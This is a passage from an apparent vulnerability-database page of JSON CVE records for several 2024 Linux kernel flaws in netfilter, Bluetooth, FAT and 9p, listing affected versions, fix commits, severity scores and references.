"dateUpdated": "2024-08-02T03:30:12.366Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4bb6da24de336a7899033a65490ed2d892efa5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c45feb3c288cf44a529e2657b36c259d86497d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13ba94f6cc820fdea15efeaa17d4c722874eebf9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8260c980aee7d8d8a3db39faf19c391d2f898816"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca34c40d1c22c555fa7f4a21a1c807fea7290a0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e30abc9ace4f0add4cd761dfdbfaebae5632dd2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e4bb6da24de336a7899033a65490ed2d892efa5b",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
},
{
"lessThan": "5c45feb3c288cf44a529e2657b36c259d86497d2",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
},
{
"lessThan": "13ba94f6cc820fdea15efeaa17d4c722874eebf9",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
},
{
"lessThan": "8260c980aee7d8d8a3db39faf19c391d2f898816",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
},
{
"lessThan": "ca34c40d1c22c555fa7f4a21a1c807fea7290a0a",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
},
{
"lessThan": "8e30abc9ace4f0add4cd761dfdbfaebae5632dd2",
"status": "affected",
"version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: honor table dormant flag from netdev release event path\n\nCheck for table dormant flag otherwise netdev release event path tries\nto unregister an already unregistered hook.\n\n[524854.857999] ------------[ cut here ]------------\n[524854.858010] WARNING: CPU: 0 PID: 3386599 at net/netfilter/core.c:501 __nf_unregister_net_hook+0x21a/0x260\n[...]\n[524854.858848] CPU: 0 PID: 3386599 Comm: kworker/u32:2 Not tainted 6.9.0-rc3+ #365\n[524854.858869] Workqueue: netns cleanup_net\n[524854.858886] RIP: 0010:__nf_unregister_net_hook+0x21a/0x260\n[524854.858903] Code: 24 e8 aa 73 83 ff 48 63 43 1c 83 f8 01 0f 85 3d ff ff ff e8 98 d1 f0 ff 48 8b 3c 24 e8 8f 73 83 ff 48 63 43 1c e9 26 ff ff ff \u003c0f\u003e 0b 48 83 c4 18 48 c7 c7 00 68 e9 82 5b 5d 41 5c 41 5d 41 5e 41\n[524854.858914] RSP: 0018:ffff8881e36d79e0 EFLAGS: 00010246\n[524854.858926] RAX: 0000000000000000 RBX: ffff8881339ae790 RCX: ffffffff81ba524a\n[524854.858936] RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8881c8a16438\n[524854.858945] RBP: ffff8881c8a16438 R08: 0000000000000001 R09: ffffed103c6daf34\n[524854.858954] R10: ffff8881e36d79a7 R11: 0000000000000000 R12: 0000000000000005\n[524854.858962] R13: ffff8881c8a16000 R14: 0000000000000000 R15: ffff8881351b5a00\n[524854.858971] FS: 0000000000000000(0000) GS:ffff888390800000(0000) knlGS:0000000000000000\n[524854.858982] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[524854.858991] CR2: 00007fc9be0f16f4 CR3: 00000001437cc004 CR4: 00000000001706f0\n[524854.859000] Call Trace:\n[524854.859006] \u003cTASK\u003e\n[524854.859013] ? __warn+0x9f/0x1a0\n[524854.859027] ? __nf_unregister_net_hook+0x21a/0x260\n[524854.859044] ? report_bug+0x1b1/0x1e0\n[524854.859060] ? handle_bug+0x3c/0x70\n[524854.859071] ? exc_invalid_op+0x17/0x40\n[524854.859083] ? asm_exc_invalid_op+0x1a/0x20\n[524854.859100] ? __nf_unregister_net_hook+0x6a/0x260\n[524854.859116] ? __nf_unregister_net_hook+0x21a/0x260\n[524854.859135] nf_tables_netdev_event+0x337/0x390 [nf_tables]\n[524854.859304] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]\n[524854.859461] ? packet_notifier+0xb3/0x360\n[524854.859476] ? _raw_spin_unlock_irqrestore+0x11/0x40\n[524854.859489] ? dcbnl_netdevice_event+0x35/0x140\n[524854.859507] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]\n[524854.859661] notifier_call_chain+0x7d/0x140\n[524854.859677] unregister_netdevice_many_notify+0x5e1/0xae0"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:20.855Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e4bb6da24de336a7899033a65490ed2d892efa5b"
},
{
"url": "https://git.kernel.org/stable/c/5c45feb3c288cf44a529e2657b36c259d86497d2"
},
{
"url": "https://git.kernel.org/stable/c/13ba94f6cc820fdea15efeaa17d4c722874eebf9"
},
{
"url": "https://git.kernel.org/stable/c/8260c980aee7d8d8a3db39faf19c391d2f898816"
},
{
"url": "https://git.kernel.org/stable/c/ca34c40d1c22c555fa7f4a21a1c807fea7290a0a"
},
{
"url": "https://git.kernel.org/stable/c/8e30abc9ace4f0add4cd761dfdbfaebae5632dd2"
}
],
"title": "netfilter: nf_tables: honor table dormant flag from netdev release event path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36005",
"datePublished": "2024-05-20T09:48:05.568Z",
"dateReserved": "2024-05-17T13:50:33.150Z",
"dateUpdated": "2025-05-04T09:10:20.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-24860 (GCVE-0-2024-24860)
Vulnerability from cvelistv5
Published
2024-02-05 07:27
Modified
2025-02-13 17:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Summary
A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux kernel |
Version: v5.6-rc1 < v6.8-rc1 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-24860",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-05T14:05:40.448336Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:19.546Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:28:12.994Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8151"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://kernel.org/",
"defaultStatus": "unaffected",
"modules": [
"bluetooth"
],
"packageName": "kernel",
"platforms": [
"Linux",
"x86",
"ARM"
],
"product": "Linux kernel",
"programFiles": [
"https://gitee.com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/hci_debugfs.c"
],
"repo": "https://gitee.com/anolis/cloud-kernel.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "v6.8-rc1",
"status": "affected",
"version": "v5.6-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u767d\u5bb6\u9a79 \u003cbaijiaju@buaa.edu.cn\u003e"
},
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u97e9\u6842\u680b \u003changuidong@buaa.edu.cn\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA race condition was found in the Linux kernel\u0027s bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\u003c/p\u003e"
}
],
"value": "A race condition was found in the Linux kernel\u0027s bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue."
}
],
"impacts": [
{
"capecId": "CAPEC-26",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-26 Leveraging Race Conditions"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:06:24.953Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8151"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://github.com/torvalds/linux/commit/da9065caa594d\"\u003ehttps://github.com/torvalds/linux/commit/da9065caa594d\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "https://github.com/torvalds/linux/commit/da9065caa594d https://github.com/torvalds/linux/commit/da9065caa594d"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Race condition vulnerability in Linux kernel bluetooth driver in {min,max}_key_size_set()",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2024-24860",
"datePublished": "2024-02-05T07:27:31.042Z",
"dateReserved": "2024-02-01T09:11:56.214Z",
"dateUpdated": "2025-02-13T17:40:34.429Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26973 (GCVE-0-2024-26973)
Vulnerability from cvelistv5
Published
2024-05-01 05:20
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fat: fix uninitialized field in nostale filehandles
When fat_encode_fh_nostale() encodes file handle without a parent it
stores only first 10 bytes of the file handle. However the length of the
file handle must be a multiple of 4 so the file handle is actually 12
bytes long and the last two bytes remain uninitialized. This is not
great at we potentially leak uninitialized information with the handle
to userspace. Properly initialize the full handle length.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 Version: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.673Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9840d1897e28f8733cc1e38f97e044f987dc0a63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f52d7663a10a1266a2d3871a6dd8fd111edc549f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a276c595c3a629170b0f052a3724f755d7c6adc6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8cc05de8e6b5612b6e9f92c385c1a064b0db375"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03a7e3f2ba3ca25f1da1d3898709a08db14c1abb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74f852654b8b7866f15323685f1e178d3386c688"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cdd33d54e789d229d6d5007cbf3f53965ca1a5c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fde2497d2bc3a063d8af88b258dbadc86bd7b57c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26973",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:45:13.490208Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:44.022Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fat/nfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9840d1897e28f8733cc1e38f97e044f987dc0a63",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "f52d7663a10a1266a2d3871a6dd8fd111edc549f",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "a276c595c3a629170b0f052a3724f755d7c6adc6",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "c8cc05de8e6b5612b6e9f92c385c1a064b0db375",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "03a7e3f2ba3ca25f1da1d3898709a08db14c1abb",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "74f852654b8b7866f15323685f1e178d3386c688",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "cdd33d54e789d229d6d5007cbf3f53965ca1a5c6",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
},
{
"lessThan": "fde2497d2bc3a063d8af88b258dbadc86bd7b57c",
"status": "affected",
"version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fat/nfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.10"
},
{
"lessThan": "3.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfat: fix uninitialized field in nostale filehandles\n\nWhen fat_encode_fh_nostale() encodes file handle without a parent it\nstores only first 10 bytes of the file handle. However the length of the\nfile handle must be a multiple of 4 so the file handle is actually 12\nbytes long and the last two bytes remain uninitialized. This is not\ngreat at we potentially leak uninitialized information with the handle\nto userspace. Properly initialize the full handle length."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:14.685Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9840d1897e28f8733cc1e38f97e044f987dc0a63"
},
{
"url": "https://git.kernel.org/stable/c/f52d7663a10a1266a2d3871a6dd8fd111edc549f"
},
{
"url": "https://git.kernel.org/stable/c/a276c595c3a629170b0f052a3724f755d7c6adc6"
},
{
"url": "https://git.kernel.org/stable/c/b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee"
},
{
"url": "https://git.kernel.org/stable/c/c8cc05de8e6b5612b6e9f92c385c1a064b0db375"
},
{
"url": "https://git.kernel.org/stable/c/03a7e3f2ba3ca25f1da1d3898709a08db14c1abb"
},
{
"url": "https://git.kernel.org/stable/c/74f852654b8b7866f15323685f1e178d3386c688"
},
{
"url": "https://git.kernel.org/stable/c/cdd33d54e789d229d6d5007cbf3f53965ca1a5c6"
},
{
"url": "https://git.kernel.org/stable/c/fde2497d2bc3a063d8af88b258dbadc86bd7b57c"
}
],
"title": "fat: fix uninitialized field in nostale filehandles",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26973",
"datePublished": "2024-05-01T05:20:09.420Z",
"dateReserved": "2024-02-19T14:20:24.203Z",
"dateUpdated": "2025-05-04T09:01:14.685Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36964 (GCVE-0-2024-36964)
Vulnerability from cvelistv5
Published
2024-06-03 07:50
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fs/9p: only translate RWX permissions for plain 9P2000
Garbage in plain 9P2000's perm bits is allowed through, which causes it
to be able to set (among others) the suid bit. This was presumably not
the intent since the unix extended bits are handled explicitly and
conditionally on .u.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36964",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T18:11:48.356880Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T18:11:56.154Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.532Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e90bc596a74bb905e0a45bf346038c3f9d1e868d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df1962a199783ecd66734d563caf0fedecf08f96"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a605930e19f451294bd838754f7d66c976a8a2c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad4f65328661392de74e3608bb736fedf3b67e32"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca9b5c81f0c918c63d73d962ed8a8e231f840bc8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e55c601af3b1223a84f9f27f9cdbd2af5e203bf3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/157d468e34fdd3cb1ddc07c2be32fb3b02826b02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd25e15e57e68a6b18dc9323047fe9c68b99290b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/9p/vfs_inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e90bc596a74bb905e0a45bf346038c3f9d1e868d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "df1962a199783ecd66734d563caf0fedecf08f96",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5a605930e19f451294bd838754f7d66c976a8a2c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ad4f65328661392de74e3608bb736fedf3b67e32",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ca9b5c81f0c918c63d73d962ed8a8e231f840bc8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e55c601af3b1223a84f9f27f9cdbd2af5e203bf3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "157d468e34fdd3cb1ddc07c2be32fb3b02826b02",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cd25e15e57e68a6b18dc9323047fe9c68b99290b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/9p/vfs_inode.c"
],
